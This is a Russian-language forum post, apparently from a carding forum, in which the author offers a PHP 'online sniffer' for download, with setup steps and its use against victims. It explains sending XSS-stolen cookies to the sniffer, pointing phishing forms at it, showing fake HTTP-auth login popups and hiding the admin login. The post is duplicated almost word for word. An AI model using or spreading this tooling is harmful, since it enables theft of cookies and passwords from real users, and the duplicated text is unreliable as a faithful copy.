Зачесались руки выложить свою "наработку" - Онлайн-сниффер.
Код быдловый, но зато работает, а быстродействие тут не критично.
Писался для себя, на скорую руку, потом оброс полезностями, и стал полезен не только мне.
Итак, начнем с установки.
1) открываем index.php, во второй строчке меняем "Carder.Pro" на свое имя.
в 4ой строчке переменной $auth_pass присваиваем ваш пароль на админку (или пасс, зашифрованый в md5, для тех кому пасс светить лень). Не забудьте кавычки по краям.
Сорханяем.
2) заливаем содержимое архива на любой хостинг с php (пох на sql, сокеты, safe_mod и тп.)
пример хостинга: //www.kilu.de
3) готово, все работает.
Как это работает:
1) Посещения жертвы:
Все заходы по адресу сайта, на который залили, считаются посещениями и записываются в лог, кроме адресов
//site/?do=show (админка)
//site/?do=clean (очистка лога. работает без пароля, чтобы была интрига))
Кроме этого, снифф принемает еще 1 параметр url. От этого параметра зависит, что вернется пользователю.
Варианты:
1) //site/ или //site/?любые параметры (тоесть параметр url не задан)- посететель улетит на свой реферер (тоесть туда, откуда пришел по ссылке. Если реферера нет (просто вбил адрес в браузере), то его перебросит на адрес, указаный в 3й строке кода снифера.
Применение: обычно напрямую стучатся любопытные, или поисковики. просто смореть кто стучал.
2) //site/?url=blank&ваши параметры - пользователь увидит белую страницу
Применение: если вы просто хотите узнать малость о тачке юзера, то вставляете адрес снифа как картинку, или нашли xss и в параметры клеите кукисы.
3) //site/?url=google.ru&ваши параметры - пользователь улетит на сайт гогла, аналогично любой урл, но без http://.
Применение: Если вы сделали фейк, положили его на другой хост, то в экшн формы пишете адрес снифа (чтобы он форму принял), а в урл пишете адрес, куда юзер улетит, после того как "залогинится".
4) //site/?url=img.gif&ваши параметры - пользователь увидит всплывающее окно с предложением ввести логин и пароль. Обращение не будет занесено в лог. Если он ничего не введет, то
при следующей загрузке этой страницы, окно всплывет снова, если юзер вобьет логин и пароль - ему присвоятся кукисы, как пометка, что больше ему это окно показывать не нужно.
Применение: ваша фантазия.
Одмынка:
Идем по адресу: //site/?do=show
никуда не тыркаем, набираем на клавиатуре ваш пароль, и жмем энтер.
Попадаем в админку если пароль верный, или на туже страницу, если не верный.
(почему так: форма для ввода пароля унесена на -много пикселей за экран и не видна, а при загрузке страницы фокус ставится на нее автоматически)
Что мы видим в админке - строчки вида:
если данные переданы в адресной строке (например куки) бортик оранжевый.
если данные переданы через веб-форму пост-запросом (например с фейка) то бортик зеленый.
Тыкаем на ip, раскрывается остальная инфа:
1)Юзер-агент - система, язык, браузер.
2)Локация - за какой территорией закреплен айпишник (база на другом хосте, подгружается через Js)
3)Куда был переадресован юзер
4)Данные из адресной строки (префикс get_)
5)Данные из формы (префикс post_)
6)Данные http-авторизации (если ввели логин и пасс во всплывающем окошке)
7) данные о проксе (если таковая имеется)
Ну вот вроде и все. Скрипт вы вправе пилить как хотите, замечания и предложения конечно приветствуются.
Бабло на нем зарабатывать запрещаю, или хотябы запилите его так, чтобы я не узнал))
Код быдловый, но зато работает, а быстродействие тут не критично.
Писался для себя, на скорую руку, потом оброс полезностями, и стал полезен не только мне.
Скачать:
//rghost.ru/1725656
//rghost.ru/1725656
Итак, начнем с установки.
1) открываем index.php, во второй строчке меняем "Carder.Pro" на свое имя.
в 4ой строчке переменной $auth_pass присваиваем ваш пароль на админку (или пасс, зашифрованый в md5, для тех кому пасс светить лень). Не забудьте кавычки по краям.
Сорханяем.
2) заливаем содержимое архива на любой хостинг с php (пох на sql, сокеты, safe_mod и тп.)
пример хостинга: //www.kilu.de
3) готово, все работает.
Как это работает:
1) Посещения жертвы:
Все заходы по адресу сайта, на который залили, считаются посещениями и записываются в лог, кроме адресов
//site/?do=show (админка)
//site/?do=clean (очистка лога. работает без пароля, чтобы была интрига))
Кроме этого, снифф принемает еще 1 параметр url. От этого параметра зависит, что вернется пользователю.
Варианты:
1) //site/ или //site/?любые параметры (тоесть параметр url не задан)- посететель улетит на свой реферер (тоесть туда, откуда пришел по ссылке. Если реферера нет (просто вбил адрес в браузере), то его перебросит на адрес, указаный в 3й строке кода снифера.
Применение: обычно напрямую стучатся любопытные, или поисковики. просто смореть кто стучал.
2) //site/?url=blank&ваши параметры - пользователь увидит белую страницу
Применение: если вы просто хотите узнать малость о тачке юзера, то вставляете адрес снифа как картинку, или нашли xss и в параметры клеите кукисы.
3) //site/?url=google.ru&ваши параметры - пользователь улетит на сайт гогла, аналогично любой урл, но без http://.
Применение: Если вы сделали фейк, положили его на другой хост, то в экшн формы пишете адрес снифа (чтобы он форму принял), а в урл пишете адрес, куда юзер улетит, после того как "залогинится".
4) //site/?url=img.gif&ваши параметры - пользователь увидит всплывающее окно с предложением ввести логин и пароль. Обращение не будет занесено в лог. Если он ничего не введет, то
при следующей загрузке этой страницы, окно всплывет снова, если юзер вобьет логин и пароль - ему присвоятся кукисы, как пометка, что больше ему это окно показывать не нужно.
Применение: ваша фантазия.
Одмынка:
Идем по адресу: //site/?do=show
никуда не тыркаем, набираем на клавиатуре ваш пароль, и жмем энтер.
Попадаем в админку если пароль верный, или на туже страницу, если не верный.
(почему так: форма для ввода пароля унесена на -много пикселей за экран и не видна, а при загрузке страницы фокус ставится на нее автоматически)
Что мы видим в админке - строчки вида:
если данных на снифф не передано - цветовой бортик белый,
если данные переданы в адресной строке (например куки) бортик оранжевый.
если данные переданы через веб-форму пост-запросом (например с фейка) то бортик зеленый.
Тыкаем на ip, раскрывается остальная инфа:
1)Юзер-агент - система, язык, браузер.
2)Локация - за какой территорией закреплен айпишник (база на другом хосте, подгружается через Js)
3)Куда был переадресован юзер
4)Данные из адресной строки (префикс get_)
5)Данные из формы (префикс post_)
6)Данные http-авторизации (если ввели логин и пасс во всплывающем окошке)
7) данные о проксе (если таковая имеется)
Ну вот вроде и все. Скрипт вы вправе пилить как хотите, замечания и предложения конечно приветствуются.
Бабло на нем зарабатывать запрещаю, или хотябы запилите его так, чтобы я не узнал))
